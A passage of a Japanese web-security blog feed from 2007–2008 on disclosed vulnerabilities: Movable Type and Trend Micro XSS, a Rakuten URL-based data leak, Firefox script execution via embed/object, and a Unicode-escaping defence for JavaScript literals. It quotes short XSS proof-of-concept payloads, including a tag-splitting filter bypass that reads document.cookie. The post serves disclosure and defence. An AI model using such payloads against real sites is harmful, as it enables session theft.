href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a> / <a href="../genre/Movable%20Type">Movable Type</a></span></p></div></div></content></entry><entry><title>MTのセキュリティ修正正式版</title><link href="http://bakera.jp/ebi/topic/3239" /><id>tag:bakera.jp,2008:/ebi/topic/3239</id><updated>2008-10-17T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/9/9">2008年9月9日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/3239">MTのセキュリティ修正正式版</a></h2><p class="subinfo"><span class="updated">更新: 2008年10月17日</span></p><ul><li><a href="http://jvn.jp/jp/JVN30385652/index.html">JVN#30385652 Movable Type におけるクロスサイトスクリプティングの脆弱性</a> <em class="domain-info">(jvn.jp)</em></li><li><a href="http://www.sixapart.jp/movabletype/news/2008/08/28-1500.html">2008年8月7日に発表したセキュリティアップデートの正式版提供開始</a> <em class="domain-info">(www.sixapart.jp)</em></li></ul><p>正式版って何やねん、と思うわけですが。どうも8月7日に出た奴と変わっていないようなので、</p><ul><li>8月7日に暫定版のパッチを提供開始したが、テストが完了していないというステータスだった</li><li>その後テストが完了したが、特に直すところはなかったので暫定版がそのまま正式版になった</li></ul><p>……という理解で良いのですかね。</p><p>Six Apart のセキュリティに関するアナウンスは、なんかいつも分かりにくいような……。</p><p class="note">※以下、2008-10-17追記。</p><p>ちなみに8月7日の修正には残念ながら修正漏れが大量にありまして、そのことはIPA経由で伝わっているはずなのです。てっきりそれが直ったものかと思ったのですが……調べてみたら全然直っていなかったという。orz</p><p>そちらは<a href="../topic/3297">10月16日</a>にいちおう対応されました。</p><ul class="comment-link"><li><a href="../topic/3239/comment">「MTのセキュリティ修正正式版」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/MT">MT</a> / <a href="../genre/IPA">IPA</a> / <a href="../genre/JPCERT%EF%BC%8FCC">JPCERT/CC</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a> / <a href="../genre/Movable%20Type">Movable Type</a></span></p></div></div></content></entry><entry><title>s/(松下|ナショナル)/パナソニック/g</title><link href="http://bakera.jp/ebi/topic/3268" /><id>tag:bakera.jp,2008:/ebi/topic/3268</id><updated>2008-10-02T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/10/1">2008年10月1日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/3268">s/(松下|ナショナル)/パナソニック/g</a></h2><p class="subinfo"><span class="updated">更新: 2008年10月2日</span></p><p>松下グループの社名変更が本日実施。</p><p>「<a href="http://panasonic.co.jp/new-company-name/">社名変更／ブランド統一情報</a> <em class="domain-info">(panasonic.co.jp)</em>」で新しいCMが公開されているのですが、未明にこれを繰り返し見ていたら、「ぱ～なそにっ」というフレーズが頭にこびりついて離れなくなってしまいました……。</p><p>以前は「あっかっるーいなっしょっなーる」のCMソングが印象的でしたが、今後はこちらを使っていくのでしょうね。</p><p class="note">※2008-10-02追記: <span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B001GGT8UA&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">連れてって 連れてって(限定盤)</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B001GGT8UA" alt="" width="1" height="1" /></span>のボーナストラックに "SEEDS OF TOMORROW - MIDDLE OF NOWHERE Panasonic VERSION -" として収録されるらしいですね。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3268/comment">「s/(松下|ナショナル)/パナソニック/g」へのコメント (1件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a></span></p></div></div></content></entry><entry><title>楽天メールマガジンの変更画面から情報漏洩</title><link href="http://bakera.jp/ebi/topic/3262" /><id>tag:bakera.jp,2008:/ebi/topic/3262</id><updated>2008-10-01T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/9/29">2008年9月29日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3262">楽天メールマガジンの変更画面から情報漏洩</a></h2><p class="subinfo"><span class="updated">更新: 2008年10月1日</span></p><p>セキュリティホールmemoより: <a href="http://www.st.ryukoku.ac.jp/~kjm/security/memo/2008/09.html#20080929__rakuten">site:emagazine.rakuten.co.jp で検索すると個人情報っぽいものが見えるとか見えないとか。</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em></p><p>メールマガジンの設定変更の画面が第三者に見えてしまう、という話のようで。まとめると、</p><ul><li>設定変更画面のURLは、ユーザごとにユニークなIDを含むものになっている</li><li>ユニークIDは複雑で、他人の変更画面のURLは簡単には推測できない (……と思うのですが未確認)</li><li>が、そのURLさえ分かってしまえば、GETリクエスト一発で認証もなしに変更画面にアクセスできてしまう</li><li>アクセスすると、現在の設定情報 (氏名、メールアドレスなど) が見えてしまう</li><li>そして何故か、そのURLをGoogleやWindows Live Searchがクロールしており、検索でヒットして残念なことに……</li></ul><p>……ということですかね。認証なしでアクセスできてしまうのは明らかにマズイと思いますが……。</p><p>しかし、むしろ気になるのは、そのURLがどうしてクロールされたのかという点です。外部のWebサイトからリンクしたりはしないと思いますし、楽天のサイト内からGETのみで辿れるようになっていたとも考えにくいように思います。</p><p>あるいは、そもそもブラウザがURLの情報を送信しているとか? 「<a href="http://www.google.com/chrome/intl/ja/privacy.html">Google Chromeのプライバシーについて</a> <em class="domain-info">(www.google.com)</em>」を見ると以下のようにあります。</p><div class="quote-and-cite"><blockquote><p>アドレス バーに URL またはキーワードを入力すると、入力した文字が Google に送信され、サジェスト機能によってユーザーの探しているキーワードや URL の候補が自動で提示されます。利用状況データを Google と共有し、提示された検索用語や URL をユーザーが承認した場合は、その情報も Google Chromeから Google に送信されます。この機能を無効にするには、こちらの手順をご覧ください。</p></blockquote></div><p>Google Chromeでアクセスしたら、URLがGoogleに送られる可能性があるように読めますが……それがクロールに使われることはあるのですかね?</p><p class="note">※といっても、べつにGoogle Chromeが漏らしていると断定しているわけではありませんので念のため。Windows Live Search でもクロールされているようですので、むしろChromeは全然関係ない可能性が高いです (Thanks: yamagataさん)。</p><p class="note">※追記: どうもソーシャルブックマークから漏洩した可能性が高いようですね。<a href="../3264">楽天メールマガジン情報漏洩続き</a>。コメントくださったみなさま、ありがとうございます。</p><ul class="comment-link"><li><a href="../topic/3262/comment">「楽天メールマガジンの変更画面から情報漏洩」へのコメント (7件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Web">Web</a> / <a href="../genre/%E6%A5%BD%E5%A4%A9">楽天</a> / <a href="../genre/Google%20Chrome">Google Chrome</a></span></p></div></div></content></entry><entry><title>楽天メールマガジン情報漏洩の話・続き</title><link href="http://bakera.jp/ebi/topic/3264" /><id>tag:bakera.jp,2008:/ebi/topic/3264</id><updated>2008-10-01T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/9/30">2008年9月30日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/3264">楽天メールマガジン情報漏洩の話・続き</a></h2><p class="subinfo"><span class="updated">更新: 2008年10月1日</span></p><p><a href="../topic/3262">楽天メールマガジンの件</a>ですが、どうもソーシャルブックマークから拾われた可能性が高いようですね (みなさん情報ありがとうございます)。OK Wave のこのやりとりは衝撃的です。</p><div class="quote-and-cite"><blockquote cite="http://okwave.jp/qa3806611.html"><p>楽天市場から届くメールを毎回配信停止にしても、次から次へとメールが届くのですがどうすれば届かないようになりますか。 </p><p class="snip"><em>(～中略～)</em></p><p>私は、毎日ここで一発で「配信停止」をしています。</p><p>http://emagazine.rakuten.co.jp/ns?act=chg_rmail&amp;k=%25CIlD-u0Lwi...​</p></blockquote><p class="cite">以上、<a href="http://okwave.jp/qa3806611.html">楽天市場について -OKWave</a> より</p></div><p>イタタタタ……。</p><p>楽天で買物をすると、確認画面の一番下の方にメールマガジン配信のチェックボックスがあります。気づきにくい上に、デフォルトでチェックONなのですよね。メールマガジンを受け取りたくない場合、買うたびにこのチェックを外す必要があります。それに気づかないと、「何度配信停止しても、買い物するたびにメールマガジンの送信が再開されてしまう」という現象が起きることになり、そうなっても簡単に配信を停止できるように、「配信停止画面をブックマークしておく」ということが行われていたと……。</p><p>ブラウザのブックマークではなく、ソーシャルブックマークを使ってブックマークしたら、それはクロールされますよね。ブックマークするなよ……と言いたくなるところですが、一般のユーザが「このURLを他人に知られてはマズイ」ということに気づくのは難しいでしょう。</p><p>URLにセッション追跡や認証のための情報を埋め込む手法については、ずっと前から「Refererから漏洩する」という危険性が指摘されてきました。逆に、「ユーザが自分で積極的にリンクする」なんてことはあまりないだろうと思っていましたが……ソーシャルブックマークの普及によって気軽にリンクができるようになり、ユーザが自分でリンクしてしまう可能性も増しているわけですね。</p><p class="note">※そういえば、WASForum Conference 2008 の「<a href="../topic/3182">携帯電話向けWebのセキュリティ</a>」でも、セッション追跡パラメータつきのURLを貼ってしまうユーザが多いという話が出ていましたね。</p><p class="note">※2008-10-01追記: タイトルについて「<a href="http://slashdot.jp/security/comments.pl?sid=420884&amp;cid=1429753">そんなにしょっちゅうやらかしてたのかと思ってしまった</a> <em class="domain-info">(slashdot.jp)</em>」というご意見をいただきましたので、タイトル変更しました。</p><ul class="comment-link"><li><a href="../topic/3264/comment">「楽天メールマガジン情報漏洩の話・続き」へのコメント (7件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Web">Web</a> / <a href="../genre/%E6%A5%BD%E5%A4%A9">楽天</a> / <a href="../genre/WASForum%20Conference">WASForum Conference</a></span></p></div></div></content></entry><entry><title>Firefoxではembedのsrcに書かれたスクリプトが動作する</title><link href="http://bakera.jp/ebi/topic/3211" /><id>tag:bakera.jp,2008:/ebi/topic/3211</id><updated>2008-09-20T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/8/11">2008年8月11日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3211">Firefoxではembedのsrcに書かれたスクリプトが動作する</a></h2><p class="subinfo"><span class="updated">更新: 2008年9月20日</span></p><p><a href="http://blogs.yahoo.co.jp/">Yahoo!ブログ</a> <em class="domain-info">(blogs.yahoo.co.jp)</em>に<a href="http://engekilife.com/blogparts/">演劇ライフのブログパーツ</a> <em class="domain-info">(engekilife.com)</em>が貼れそうかどうか調べていたのですが、その過程でどうでも良いことを発見。</p><p>以下のように、<dfn class="element"><a href="../../ref/html/element/img">img要素</a></dfn>の<dfn class="element"><a href="../../ref/html/attribute/src@img">src属性</a></dfn>に javascript: で始まる値が吐かれてしまうという<dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn>の例がよくあります。</p><div class="sample"><p>&lt;img src="javascript:alert(1)" /&gt;</p></div><p>これは IE6 で見るとスクリプトが実行されますが、Firefoxでは何も起きないというのが通説です。これを実行する意味は無いと思いますし、これで良いと思います。</p><p>が、驚いたことに、こういう出力がなされると……</p><div class="sample"><p>&lt;embed src="javascript:alert(1)"&gt;&lt;/embed&gt;</p></div><p>なんとFirefoxではこれが実行されるという。互換性の都合で対応しているだけの要素だからかと思いきや、</p><div class="sample"><p>&lt;object data="javascript:alert(1)"&gt;&lt;/object&gt;</p></div><p><dfn class="element"><a href="../../ref/html/element/object">object要素</a></dfn>でも一緒でした。嫌なパターンですね……。</p><p class="note">※もっとも、objectやembedで任意のデータを埋め込める時点でいろいろできてしまうはずなので、この形でのスクリプト実行が問題になることは少なかろうと思いますが。</p><p class="note">※2008-09-20追記: 脆弱性が修正されたようなので、本文を少し修正しました。</p><ul class="comment-link"><li><a href="../topic/3211/comment">「Firefoxではembedのsrcに書かれたスクリプトが動作する」へのコメント (1件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Firefox">Firefox</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>とある改竄報告ページにあった脆弱性の話</title><link href="http://bakera.jp/ebi/topic/3146" /><id>tag:bakera.jp,2008:/ebi/topic/3146</id><updated>2008-07-30T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/5/23">2008年5月23日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/3146">とある改竄報告ページにあった脆弱性の話</a></h2><p class="subinfo"><span class="updated">更新: 2008年7月30日</span></p><p>少し前、<a href="http://www.itmedia.co.jp/enterprise/articles/0803/12/news095.html">トレンドマイクロのサイトが改竄された</a> <em class="domain-info">(www.itmedia.co.jp)</em>という話がありましたが、トレンドマイクロのサイトには「弊社ウイルス情報ページの改ざんについて」というお知らせが掲載されていました。</p><p>それを見ていたら、ふとページの右上に検索フォームが存在するのに気づいたのですが、その検索フォームに<dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn>があってズッコケたので届け出ていたのでした。</p><p>そして今日、IPAの方からこんなメールが。</p><div class="quote-and-cite"><blockquote><p>トレンドマイクロの件につきまして、ウェブサイト運営者より、届出いただきました脆弱性に対する修正が完了したとの報告がありましたのでご連絡いたします。</p></blockquote></div><p>有名サイトですし、改竄報告ページが脆弱というのは面白いので日記に書こうかなと思い、念のため確認してみたわけです。</p><p>するとこれが、入力された文字列からタグ部分だけ消去するという、典型的なダメ回避策なわけですよ。そして案の定……。</p><div class="sample"><p>"&gt;&lt;scr&lt;s&gt;ipt&gt;alert(document.cookie)&lt;/sc&lt;s&gt;ript&gt;</p></div><p>……こんな感じの検索で貫通。</p><p>もっと頑張ってください、としか言いようがないです。</p><p class="note">※2008-07-30追記: 修正されたので非公開部分を公開しました。参考: <a href="../topic/3199">トレンドマイクロのサイトの脆弱性が修正された</a></p><ul class="comment-link"><li><a href="../topic/3146/comment">「とある改竄報告ページにあった脆弱性の話」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a> / <a href="../genre/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E8%84%86%E5%BC%B1%E6%80%A7">クロスサイトスクリプティング脆弱性</a></span></p></div></div></content></entry><entry><title>JavaScript のリテラルに任意の文字列を出力してみる</title><link href="http://bakera.jp/ebi/topic/3065" /><id>tag:bakera.jp,2008:/ebi/topic/3065</id><updated>2008-01-27T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/1/23">2008年1月23日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/3065">JavaScript のリテラルに任意の文字列を出力してみる</a></h2><p class="subinfo"><span class="updated">更新: 2008年1月27日</span></p><p>Web アプリケーションのセキュリティガイドラインには、たいていの場合「スクリプト内に動的生成の文字列などを出力してはならない」という掟があったりするのですが、それにあえて背く場合のお話。</p><p>こんな感じの HTML 断片があったとします。</p><div class="sample"><p>&lt;script type="text/javascript"&gt;<br />&lt;!--<br />foo.bar = &lt;%= value %&gt;;<br />//--&gt;<br />&lt;/script&gt;</p></div><p>そして、この「&lt;%= value %&gt;」の部分に、ユーザが検索文字列として入力した任意の値を入れるというのが課題です。もちろん、そのまま出力すると <dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn> であっさり死亡するので、何らかの処理をしてから出力する必要があります。ちなみに、ユーザが何を入力したのか正確に知りたいので、任意の文字を削除したりすることはできない (削除してしまうと仕様を満たせない) と考えてください。</p><p>要はエスケープ処理をすれば良いのですが、このエスケープ処理が<em>凄い難易度</em>です。たとえば、Ruby on Rails の場合だと escape_javascript というヘルパーが用意されているので、</p><div class="sample"><p>foo.bar = '&lt;%= escape_javascript(value) %&gt;';</p></div><p>……と書けば良さそうに思うかもしれませんが、"&lt;/script&gt;&lt;iframe……" などが渡されるとあっさり陥落します (おそらく、escape_javascript は外部 JS ファイル内での出力しか想定していない)。</p><p>文字列を to_json してしまうと良さそうにも思えますが、</p><div class="sample"><p>foo.bar = &lt;%= value.to_json %&gt;;</p></div><p>実は to_json だと "--" がそのまま残ってしまうので、COM (コメント区切り子) がインジェクションできてしまいます。まあ <dfn class="element"><a href="../../ref/html/element/script">script要素</a></dfn>の内容モデルは <dfn class="data"><a href="../../ref/html/data/cdata">CDATA</a></dfn> なので COM が出力されても問題はないと言えばないのですが、</p><ul><li>script要素を知らないブラウザの場合 (今時あるのかは謎ですが……ちなみに「スクリプトを実行できないブラウザ」とはイコールではありません)</li><li>XHTML として「正しく」解釈された場合</li></ul><p>などでコメント区切り子が生きてくる可能性があるので、-- が出力されてしまうと問題があります。</p><p>と、そんなこんなでいろいろ考えたのですが、結局、全部 '\uXXXX' の形式 (<a href="http://www.remus.dti.ne.jp/~a-satomi/">ありみかさとみ先生</a> <em class="domain-info">(www.remus.dti.ne.jp)</em>によると「ユニコードエスケープ」と呼ばれたりするらしい) で出力することにしました。「<a href="http://d.hatena.ne.jp/secondlife/20060812/1155346013">Rails の to_json を 13 倍速くする方法</a> <em class="domain-info">(d.hatena.ne.jp)</em>」を参考に、こんな感じ。</p><div class="sample"><p>def js_unicode_escape(text)<br />  text.gsub(/([\x00-\x7f]|[\xC0-\xDF][\x80-\xBF]|[\xE0-\xEF][\x80-\xBF]{2}|[\xF0-\xF7][\x80-\xBF]{3})+/ux) { |s| s.unpack("U*").pack("n*").unpack("H*")[0].gsub(/.{4}/, '\\\\u\&amp;') }<br />end</p></div><p>これで一切合切が (NUL文字さえも) \uXXXX の形式で出力されるようになったので、これを '' の中に突っ込みます。</p><div class="sample"><p>foo.bar = '&lt;%= js_unicode_escape(value) %&gt;';</p></div><p>たとえば、「'"&lt;/script&gt;--&gt;」という文字列を投入すると、こんな感じで出力されます。</p><div class="sample"><p>foo.bar = '\u0027\u0022\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u002d\u002d\u003e';</p></div><p>これで、'' の中にはどうやっても \ と u と [0123456789abcdef] しか出現しないはずなので、まあ大丈夫かなぁと……。</p><p class="note">※……と、思うのですが、それでも一抹の不安がぬぐえない。</p><p class="note">※2008-01-27追記 : ちなみに、このコードは <dfn class="glossary"><a href="../../glossary/BMP">BMP</a></dfn> にない文字に対応していません。本来は \x10000 以上の文字はサロゲートペアにして出力してやらないとダメです。</p><p class="note">※2009-01-09追記 : <a href="../topic/3068">サロゲート対応版</a>もどうぞ。</p><ul class="comment-link"><li><a href="../topic/3065/comment">「JavaScript のリテラルに任意の文字列を出力してみる」へのコメント (7件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E8%84%86%E5%BC%B1%E6%80%A7">クロスサイトスクリプティング脆弱性</a> / <a href="../genre/Ruby">Ruby</a> / <a href="../genre/JavaScript">JavaScript</a></span></p></div></div></content></entry><entry><title>IE + Firefox2 の脆弱性</title><link href="http://bakera.jp/ebi/topic/2937" /><id>tag:bakera.jp,2008:/ebi/topic/2937</id><updated>2007-07-16T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2007/7/12">2007年7月12日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/2937">IE + Firefox2 の脆弱性</a></h2><p class="subinfo"><span class="updated">更新: 2007年7月16日</span></p><p>「<a href="http://japan.cnet.com/news/sec/story/0,2000056024,20352586,00.htm">IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスク</a> <em class="domain-info">(japan.cnet.com)</em>」。</p><p>コマンドライン引数のインジェクションですか。とりあえず、レジストリの以下の2つのキーを無効にしておけば良いようですね。</p><ul><li>HKEY_CLASSES_ROOT\FirefoxURL</li><li>HKEY_CLASSES_ROOT\FirefoxHTML</li></ul><p>これらを適当にリネームしてみたところ、firefoxurl: は動作しなくなりました。</p><p class="note">※<a href="http://www.st.ryukoku.ac.jp/~kjm/security/memo/2007/07.html#20070712_IE">セキュリティホールmemoの記述</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em>によると Firefox.URL というドット入りのキーもあるらしいのですが、手元の環境には該当するキーはありませんでした。環境依存なのかも。</p><p class="note">※2007-07-16追記: 「FirefoxHTML」のほうのレジストリキーは、無効にしなくても大丈夫なようです。<a href="../topic/2946">IE + Firefox2 の脆弱性 追記</a>参照。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/2937/comment">「IE + Firefox2 の脆弱性」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Internet%20Explorer">Internet Explorer</a> / <a href="../genre/Firefox">Firefox</a></span></p></div></div></content></entry><entry><title>最新のHTMLって何?</title><link href="http://bakera.jp/ebi/topic/2882" /><id>tag:bakera.jp,2008:/ebi/topic/2882</id><updated>2007-05-16T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2007/5/13">2007年5月13日(日曜日)</a></h1><div class="topic"><h2><a href="../topic/2882">最新のHTMLって何?</a></h2><p class="subinfo"><span class="updated">更新: 2007年5月16日</span></p><p>「<a href="http://allabout.co.jp/internet/hpcreate/closeup/CU20070512A/">全問正解できる？ HTML文法基礎クイズ</a> <em class="domain-info">(allabout.co.jp)</em>」というものがあるようですが、難易度がとても高いですね。全問正解できる人いるんでしょうか?</p><p>私が悩んだ難問だけメモ。</p><div class="section"><h3 id="section36">Q1</h3><div class="quote-and-cite"><blockquote cite="http://allabout.co.jp/internet/hpcreate/closeup/CU20070512A/index.htm"><p>Q1. 非推奨要素</p><p>以下の4つの記述のうち、文法的に最新のHTMLでは使わないことが推奨されているものがあります。それはどれでしょうか？</p><p>1. &lt;strong&gt; ～ &lt;/strong&gt;</p><p>2. &lt;b&gt; ～ &lt;/b&gt;</p><p>3. &lt;table&gt; ～ &lt;/table&gt;</p><p>4. &lt;h1&gt; ～ &lt;/h1&gt;</p></blockquote><p class="cite">以上、<a href="http://allabout.co.jp/internet/hpcreate/closeup/CU20070512A/index.htm">全問正解できる？ HTML文法基礎クイズ</a> より</p></div><p>初っぱなから超難問で、私には答えが全く分からないのですが……。ちなみに、<dfn class="element"><a href="../../ref/html/element/b">b要素</a></dfn>は使わない方が良いと個人的には思いますが、HTML4.01 では deprecated になっていませんし、XHTML1.1 でも Presentation モジュールの中に含まれています。「<em>文法的に</em>使わないことが推奨されている」となると誤りです。</p><p>普通に考えると正解がないのですが、そもそも「最新のHTML」という言葉の定義が問題なのかもしれません。普通に考えると HTML4.01 か XHTML1.1 なのではないかと思いますが、この著者はさらに先を行っている可能性もあります。</p><p>調べてみると、XHTML2 の現在の WD では <dfn class="element"><a href="../../ref/html/element/b">b要素</a></dfn>が存在しません。HTML5 ではすべての要素が存在するようですが、bについては「ほかに使える要素がないときだけ使う」という旨の記述もあり、あんまり勧められていない雰囲気です。</p><p class="note">※2007-05-16追記: XHTML2 には <dfn class="element"><a href="../../ref/html/element/h1">h1要素</a></dfn>もないと思っていましたが、ありましたね。山岸さん、ご指摘ありがとうございます。</p><p>というわけで、XHTML2 や HTML5 を想定すると 2. が答えになる可能性はありますが、いくら何でも新しすぎますし、「仕様的に使わないことが推奨されている」とは言えないような気がするのですよね。</p></div><div class="section"><h3 id="section37">Q2</h3><div class="quote-and-cite"><blockquote cite="http://allabout.co.jp/internet/hpcreate/closeup/CU20070512A/index2.htm"><p>HTMLソース内で、最初に記述すべきことは以下のうちのどれでしょうか？（※何も省略せずに記述する場合を考えて下さい。）</p><p>1. DOCTYPE宣言</p><p>2. XML宣言</p><p>3. &lt;html&gt;タグ</p><p>4. &lt;head&gt;タグ</p></blockquote><p class="cite">以上、<a href="http://allabout.co.jp/internet/hpcreate/closeup/CU20070512A/index2.htm">全問正解できる？ HTML文法基礎クイズ</a> より</p></div><p>これも難問。「記述しなければならない」であれば答えは明白なのですが、この問題では「記述するべき」となっているので注意が必要です。そもそも、ここで言う「HTMLソース」が XHTML なのかどうかも問題から読み取れません。さらに「何も省略せずに記述する場合を考えて下さい」とあるのも問題をややこしくしています。</p><p>XHTML を想定するなら、文書型宣言の前に XML 宣言を記述することが強く推奨されています。XHTML1.0 と XHTML1.1 には、それぞれ以下のような記述があります。</p><div class="quote-and-cite" xml:lang="en"><blockquote cite="http://www.w3.org/TR/xhtml11/conformance.html"><p>An XML declaration is not required in all XML documents; however XHTML document authors are strongly encouraged to use XML declarations in all their documents.</p></blockquote><p class="cite">以上、<a href="http://www.w3.org/TR/xhtml11/conformance.html">XHTML1.0(Second Edition) 3.1.1. Strictly Conforming Documents</a> より</p></div><div class="quote-and-cite" xml:lang="en"><blockquote cite="http://www.w3.org/TR/xhtml11/conformance.html"><p>XHTML document authors are strongly encouraged to use XML declarations in all their documents.</p></blockquote><p class="cite">以上、<a href="http://www.w3.org/TR/xhtml11/conformance.html">XHTML1.1 2.1.1. Strictly Conforming Documents</a> より</p></div><p>XML宣言は省略可能ですが、「何も省略せずに記述する場合を考えて下さい」ということですので、XHTML を想定するならこれでファイナルアンサーでしょう。</p><p>問題は XML でない HTML を想定したときです。SGML では、文書型宣言の前には注釈宣言と処理命令、そして空白類文字が書ける (けれども省略できる) ことになっています。XML 宣言は処理命令ですから、文書型宣言の前に書くことができる (けれども省略できる) ことになります。「何も省略せずに」という言葉は、SGML な HTML であっても 「XML宣言」を答えとするようにと示唆しているようにも思えます。</p><p>ただ、「記述すべきことは……」というのが微妙なのですよね。XHTML でない HTML に XML 宣言を「記述すべき」とは思えませんし。</p></div><div class="section"><h3 id="section38">Q4</h3><div class="quote-and-cite"><blockquote cite="http://allabout.co.jp/internet/hpcreate/closeup/CU20070512A/index4.htm"><p>以下の4つのHTMLソースの中には、1つだけ文法的に誤っている記述があります。それはどれでしょうか？</p><p>1. &lt;h1&gt;クイズ&lt;span class="en"&gt;QUIZ&lt;/span&gt;&lt;/h1&gt;</p><p>2. &lt;a href="/"&gt;HOMEへ&lt;strong&gt;戻る&lt;/strong&gt;&lt;/a&gt;</p><p>3. &lt;p&gt;&lt;img src="sea.jpg" alt="海の写真"&gt;&lt;/p&gt;</p><p>4. &lt;a href="./album/"&gt;&lt;h2&gt;アルバムコーナー&lt;/h2&gt;&lt;/a&gt;</p></blockquote><p class="cite">以上、<a href="http://allabout.co.jp/internet/hpcreate/closeup/CU20070512A/index4.htm">全問正解できる？ HTML文法基礎クイズ</a> より</p></div><p>まあ普通の問題、と思いきや、実は HTML2.0 だと</p><div class="quote-and-cite"><blockquote><p>&lt;!ENTITY % A.content   "(%heading|%text)*"&gt;</p><p>&lt;!ELEMENT A     - - %A.content -(A)&gt;</p></blockquote></div><p>だったりしたので <dfn class="element"><a href="../../ref/html/element/a">a要素</a></dfn>の中に見出しを入れることができました。</p><p>もちろんそれは過去の話ですので、ここで迷うことはないと思いますが、Q1 と Q2 が難問だっただけに何かあるのではないかと勘ぐってしまいます。</p></div><div class="section"><h3 id="section39">Q7</h3><div class="quote-and-cite"><blockquote cite="http://allabout.co.jp/internet/hpcreate/closeup/CU20070512A/index7.htm"><p>Q7. 